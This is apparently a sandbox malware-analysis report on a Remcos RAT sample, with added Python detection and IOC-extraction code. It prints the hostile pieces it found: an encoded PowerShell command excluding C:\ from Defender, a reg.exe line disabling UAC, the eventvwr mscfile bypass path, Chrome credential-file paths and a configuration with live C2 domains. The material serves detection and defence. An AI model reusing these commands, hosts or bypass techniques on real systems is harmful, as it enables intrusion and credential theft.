

Windows Analysis Report
kyFBQxVbsg.exe

Overview

General Information

Sample Name: kyFBQxVbsg.exe
Analysis ID: 652393
MD5: 972334f0c55d0aeab0b32efe41ea3470
SHA1: e9097b5cd1f976ecaf0accedf14f1d22bd72e6fa
SHA256: eb91bf1e2eb3877f0942cef113bb0fb76e2c2fd2c2651dbf09f6da6df649e8fb
Tags: exe, RAT, RemcosRAT

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Contains functionality to steal Firefox passwords or cookies
Yara detected Costura Assembly Loader
Encrypted powershell cmdline option found
Machine Learning detection for sample
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Contains functionality to inject code into remote processes
Installs a global keyboard hook
Delayed program exit found
Contains functionality to steal Chrome passwords or cookies
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and launch executables
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to simulate mouse events

Classification

  • System is w10x64
  • kyFBQxVbsg.exe (PID: 6232 cmdline: "C:\Users\user\Desktop\kyFBQxVbsg.exe" MD5: 972334F0C55D0AEAB0B32EFE41EA3470)
    • powershell.exe (PID: 6288 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • InstallUtil.exe (PID: 2328 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)
    • InstallUtil.exe (PID: 6528 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)
  • Qerdo.exe (PID: 6216 cmdline: "C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe" MD5: 972334F0C55D0AEAB0B32EFE41EA3470)
    • InstallUtil.exe (PID: 2592 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)
    • InstallUtil.exe (PID: 5836 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)
  • Qerdo.exe (PID: 5652 cmdline: "C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe" MD5: 972334F0C55D0AEAB0B32EFE41EA3470)
    • InstallUtil.exe (PID: 4900 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)
    • InstallUtil.exe (PID: 6304 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)
  • cleanup
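The process tree above shows the two host-side behaviours worth turning into detections: powershell.exe launched with an encoded command, and InstallUtil.exe launched with no arguments by a user-land .NET executable, which is the pattern behind the report's "creates a process in suspended mode" and remote-injection signatures. The Python below is an added example, not part of the Joe Sandbox report: it decodes the -enc payload (which turns out to add a Defender exclusion for the whole C: drive) and flags both patterns, plus execution from AppData\Roaming, over a process list constructed from the tree. The parent PIDs of the two tree roots are not in the report and are set to 0.

```python
"""Triage of the process tree above: added example, not part of the Joe Sandbox
report. Decodes PowerShell -enc payloads and flags three behaviours the tree
exhibits: an encoded Defender-exclusion command, InstallUtil.exe started with
no arguments (a common process-hollowing host), and an executable running
from AppData\\Roaming."""
import base64
import re
from typing import List, Optional, Tuple

# Constructed from the process tree above: (pid, parent pid, image path, command line).
# Parent PIDs of the two tree roots are not in the report, so 0 stands for "unknown".
PROCESS_EVENTS = [
    (6232, 0, r"C:\Users\user\Desktop\kyFBQxVbsg.exe",
     r'"C:\Users\user\Desktop\kyFBQxVbsg.exe"'),
    (6288, 6232, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA=='),
    (2328, 6232, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"),
    (6216, 0, r"C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe",
     r'"C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe"'),
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand, down to -e.
_ENC_PREFIXES = sorted(("encodedcommand"[:i] for i in range(1, 15)), key=len, reverse=True)
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:%s)\s+([A-Za-z0-9+/=]+)" % "|".join(_ENC_PREFIXES))

# Set-/Add-MpPreference calls that carve out exclusions or switch protections off.
DEFENDER_TAMPER = re.compile(
    r"(?i)\b(?:Set|Add)-MpPreference\b.*?-(?:Exclusion(?:Path|Extension|Process|IpAddress)|Disable\w+)"
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE plaintext behind -EncodedCommand, or None if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(events) -> List[Tuple[int, str, str]]:
    """Return (pid, finding, detail) tuples for the suspicious patterns in the tree."""
    image_by_pid = {pid: image for pid, _, image, _ in events}
    findings = []
    for pid, ppid, image, cmdline in events:
        name = image.rsplit("\\", 1)[-1].lower()
        if name == "powershell.exe":
            decoded = decode_encoded_command(cmdline)
            if decoded and DEFENDER_TAMPER.search(decoded):
                findings.append((pid, "defender_exclusion", decoded))
        # InstallUtil.exe needs an assembly path to do anything useful; a bare
        # launch by a non-developer process is the hollowing pattern the report's
        # suspended-process signature points at. Detail = the parent image.
        if name == "installutil.exe" and cmdline.strip().strip('"').lower() == image.lower():
            findings.append((pid, "installutil_no_args", image_by_pid.get(ppid, "unknown parent")))
        if "\\appdata\\roaming\\" in image.lower():
            findings.append((pid, "exec_from_appdata", image))
    return findings


if __name__ == "__main__":
    for pid, kind, detail in triage(PROCESS_EVENTS):
        print(f"{pid}\t{kind}\t{detail}")
```

The decoded command is `Start-Sleep -Seconds 10; Set-MpPreference -ExclusionPath 'C:\'`, which is why the report's "Encrypted powershell cmdline option found" signature deserves more weight than its generic name suggests: the exclusion blinds Defender to every later drop, including the Qerdo.exe copy in AppData.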
{"Version": "3.5.1 Pro", "Host:Port:Password": "nikahuve.ac.ug:6968:0kalskala.ac.ug:6968:0tuekisaa.ac.ug:6968:0parthaha.ac.ug:6968:0", "Assigned name": "06192022", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "cvxyttydfsgbghfgfhtd-RXTSAM", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "scxs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "forbas", "Keylog file max size": "0"}
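The extracted configuration above can be turned directly into a hunt list. The Python below is an added example, not part of the Joe Sandbox report: it splits the run-on C2 string into host/port records (the extractor dropped the non-printable record separator, so the parser assumes a one-character flag after each port, which is the layout the string shows, and refuses to guess if that does not hold), and derives the Run key, mutex and keylog file path from the config fields. One caveat the page itself supports: "Install flag" is Disable, so the "Copy folder"/"Copy file" values (Remcos\remcos.exe) are not expected on disk; the Ppjollp\Qerdo.exe copy in the process tree has the MD5 of the outer sample, i.e. it is the .NET loader re-installing itself, not the Remcos payload.

```python
"""Hunt list from the Remcos configuration above: added example, not part of
the Joe Sandbox report. The extractor prints the C2 list as one run-on string
because the record separator between entries is non-printable; this parser
assumes each record is host:port:flag with a one-character flag and raises if
the records do not tile the string exactly."""
import json
import re
from typing import Dict, List, Tuple

# Subset of the report's Malware Configuration Extractor output, copied verbatim.
REMCOS_CONFIG = {
    "Version": "3.5.1 Pro",
    "Host:Port:Password": "nikahuve.ac.ug:6968:0kalskala.ac.ug:6968:0tuekisaa.ac.ug:6968:0parthaha.ac.ug:6968:0",
    "Install flag": "Disable",
    "Setup HKCU\\Run": "Enable",
    "Setup HKLM\\Run": "Disable",
    "Install path": "AppData",
    "Copy folder": "Remcos",
    "Copy file": "remcos.exe",
    "Startup value": "Remcos",
    "Mutex": "cvxyttydfsgbghfgfhtd-RXTSAM",
    "Keylog flag": "1",
    "Keylog path": "AppData",
    "Keylog folder": "forbas",
    "Keylog file": "scxs.dat",
}

C2_RECORD = re.compile(r"([A-Za-z0-9.-]+):(\d{1,5}):(\w)")

RUN_KEYS = {
    "Setup HKCU\\Run": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
    "Setup HKLM\\Run": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
}
# Remcos composes "<path root>\<folder>\<file>"; the "AppData" root is %APPDATA%.
PATH_ROOTS = {"AppData": "%APPDATA%"}


def parse_c2(blob: str) -> List[Tuple[str, int, str]]:
    """Split the run-on host:port:flag string into (host, port, flag) records."""
    records = [(h, int(p), f) for h, p, f in C2_RECORD.findall(blob)]
    # The records must tile the whole string; otherwise the one-character-flag
    # assumption is wrong for this sample and the output would be misleading.
    if "".join(f"{h}:{p}:{f}" for h, p, f in records) != blob:
        raise ValueError("C2 blob does not match the host:port:flag layout")
    return records


def build_iocs(cfg: Dict[str, str]) -> Dict[str, object]:
    """Network, registry and file indicators implied by the configuration."""
    c2 = parse_c2(cfg["Host:Port:Password"])
    iocs = {
        "c2_hosts": [h for h, _, _ in c2],
        "c2_ports": sorted({p for _, p, _ in c2}),
        "mutex": cfg["Mutex"],
        # Run-key persistence as configured; the report observed Qerdo.exe
        # re-launching, so check this even though Install flag is Disable.
        "run_keys": [f"{RUN_KEYS[k]}\\{cfg['Startup value']}" for k in RUN_KEYS if cfg.get(k) == "Enable"],
        "files": [],
    }
    # Non-zero keylog flag = keylogger on (the report saw a global keyboard hook).
    if cfg.get("Keylog flag", "0") != "0":
        root = PATH_ROOTS.get(cfg["Keylog path"], cfg["Keylog path"])
        iocs["files"].append(f"{root}\\{cfg['Keylog folder']}\\{cfg['Keylog file']}")
    # With Install flag Disable the payload does not copy itself, so the
    # Copy folder/Copy file pair is only an indicator when install is enabled.
    if cfg.get("Install flag") == "Enable":
        root = PATH_ROOTS.get(cfg["Install path"], cfg["Install path"])
        iocs["files"].append(f"{root}\\{cfg['Copy folder']}\\{cfg['Copy file']}")
    return iocs


if __name__ == "__main__":
    print(json.dumps(build_iocs(REMCOS_CONFIG), indent=2))
```

All four C2 hosts share port 6968, which matches the single TCP flow to 194.5.98.107:6968 in the Networking section below; the other three hosts were not contacted during the run and are hunt-only indicators.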
Source | Rule | Description | Author | Strings
00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer | detects Windows executables potentially bypassing UAC using eventvwr.exe | ditekSHen
  • 0x61100:$s1: \Classes\mscfile\shell\open\command
  • 0x61160:$s1: \Classes\mscfile\shell\open\command
  • 0x61148:$s2: eventvwr.exe
00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp | REMCOS_RAT_variants | unknown | unknown
  • 0x62094:$str_a1: C:\Windows\System32\cmd.exe
  • 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x611f4:$str_b2: Executing file:
  • 0x621d8:$str_b3: GetDirectListeningPort
  • 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x61c38:$str_b7: \update.vbs
  • 0x6121c:$str_b9: Downloaded file:
  • 0x61208:$str_b10: Downloading file:
  • 0x612ac:$str_b12: Failed to upload file:
  • 0x621a0:$str_b13: StartForward
  • 0x621c0:$str_b14: StopForward
  • 0x61be0:$str_b15: fso.DeleteFile "
  • 0x61b74:$str_b16: On Error Resume Next
  • 0x61c10:$str_b17: fso.DeleteFolder "
  • 0x6129c:$str_b18: Uploaded file:
  • 0x6125c:$str_b19: Unable to delete:
  • 0x61ba8:$str_b20: while fso.FileExists("
  • 0x61731:$str_c0: [Firefox StoredLogins not found]
00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer | detects Windows executables potentially bypassing UAC using eventvwr.exe | ditekSHen
  • 0x61100:$s1: \Classes\mscfile\shell\open\command
  • 0x61160:$s1: \Classes\mscfile\shell\open\command
  • 0x61148:$s2: eventvwr.exe
(This memory-dump table has 97 entries; only the first ones are reproduced here.)

Source | Rule | Description | Author | Strings
17.0.InstallUtil.exe.400000.5.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
17.0.InstallUtil.exe.400000.5.raw.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer | detects Windows executables potentially bypassing UAC using eventvwr.exe | ditekSHen
  • 0x61100:$s1: \Classes\mscfile\shell\open\command
  • 0x61160:$s1: \Classes\mscfile\shell\open\command
  • 0x61148:$s2: eventvwr.exe
17.0.InstallUtil.exe.400000.5.raw.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x62094:$str_a1: C:\Windows\System32\cmd.exe
  • 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x611f4:$str_b2: Executing file:
  • 0x621d8:$str_b3: GetDirectListeningPort
  • 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x61c38:$str_b7: \update.vbs
  • 0x6121c:$str_b9: Downloaded file:
  • 0x61208:$str_b10: Downloading file:
  • 0x612ac:$str_b12: Failed to upload file:
  • 0x621a0:$str_b13: StartForward
  • 0x621c0:$str_b14: StopForward
  • 0x61be0:$str_b15: fso.DeleteFile "
  • 0x61b74:$str_b16: On Error Resume Next
  • 0x61c10:$str_b17: fso.DeleteFolder "
  • 0x6129c:$str_b18: Uploaded file:
  • 0x6125c:$str_b19: Unable to delete:
  • 0x61ba8:$str_b20: while fso.FileExists("
  • 0x61731:$str_c0: [Firefox StoredLogins not found]
24.2.Qerdo.exe.5440000.4.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
24.2.Qerdo.exe.5440000.4.unpack | MALWARE_Win_zgRAT | Detects zgRAT | ditekSHen
  • 0x5b6a2:$s1: file:///
  • 0x5b5fe:$s2: {11111-22222-10009-11112}
  • 0x5b632:$s3: {11111-22222-50001-00000}
  • 0x58303:$s4: get_Module
  • 0x5841f:$s5: Reverse
  • 0x59b22:$s6: BlockCopy
  • 0x5a1a4:$s7: ReadByte
  • 0x5b6b6:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
(This unpacked-PE table has 187 entries; only the first ones are reproduced here.)

No Sigma rule has matched
No Snort rule has matched
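The ditekSHen and REMCOS_RAT_variants rules above match on two UAC-related artefacts embedded in the unpacked payload: the mscfile\shell\open\command handler used by the eventvwr.exe auto-elevation bypass, and a reg.exe command line that rewrites EnableLUA. Whether the sample exercised either at runtime is not shown in this report, so both are things to check on a host rather than facts about the run. The Python below is an added example (not from the report) of that host check: it parses a Windows .reg export so it runs offline; the export is constructed, and the path in the handler value is a placeholder, not an indicator from the sample.

```python
"""Host check for the two UAC-related indicators the Yara rules above matched:
added example, not part of the Joe Sandbox report. Looks for a per-user
mscfile handler (the eventvwr.exe bypass registers it under HKCU so that the
auto-elevated Event Viewer launches it) and for EnableLUA forced to 0. Works
on a .reg export so it runs offline; on a live host, read the same keys with
winreg. SAMPLE_REG is constructed; the handler target is a placeholder."""
from typing import Dict, List, Optional, Tuple

SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command]
@="C:\\Users\\user\\AppData\\Roaming\\example\\payload.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000
"ConsentPromptBehaviorAdmin"=dword:00000005
"""

MSCFILE_CMD = r"hkey_current_user\software\classes\mscfile\shell\open\command"
UAC_POLICY = r"hkey_local_machine\software\microsoft\windows\currentversion\policies\system"


def parse_reg(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal .reg parser: {key path (lower-case): {value name (lower-case): raw value}}."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
        elif current is not None and "=" in line and not line.startswith(";"):
            name, _, value = line.partition("=")
            name = "@" if name == "@" else name.strip('"').lower()
            keys[current][name] = value
    return keys


def dword(raw: str) -> Optional[int]:
    """Decode a .reg 'dword:XXXXXXXX' value; None for anything else."""
    return int(raw[6:], 16) if raw.lower().startswith("dword:") else None


def uac_findings(keys: Dict[str, Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (finding, detail) pairs for the two UAC indicators."""
    findings = []
    handler = keys.get(MSCFILE_CMD, {})
    if "@" in handler:
        # A per-user mscfile handler does not exist on a clean system, so its
        # presence is the indicator regardless of what it points to.
        findings.append(("mscfile_handler_hijack", handler["@"].strip('"')))
    if dword(keys.get(UAC_POLICY, {}).get("enablelua", "")) == 0:
        findings.append(("enablelua_disabled", UAC_POLICY))
    return findings


if __name__ == "__main__":
    for kind, detail in uac_findings(parse_reg(SAMPLE_REG)):
        print(f"{kind}\t{detail}")
```

The EnableLUA change needs administrative rights and only takes effect after a reboot, so on a live incident the mscfile handler is the earlier and more reliable signal; the reg.exe string in the payload is what the bypass would run once elevated.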



AV Detection

Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe | Avira: detection malicious, Label: TR/Dropper.MSIL.Gen
Source: kyFBQxVbsg.exe | Virustotal: Detection: 46%
Source: kyFBQxVbsg.exe | ReversingLabs: Detection: 57%
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
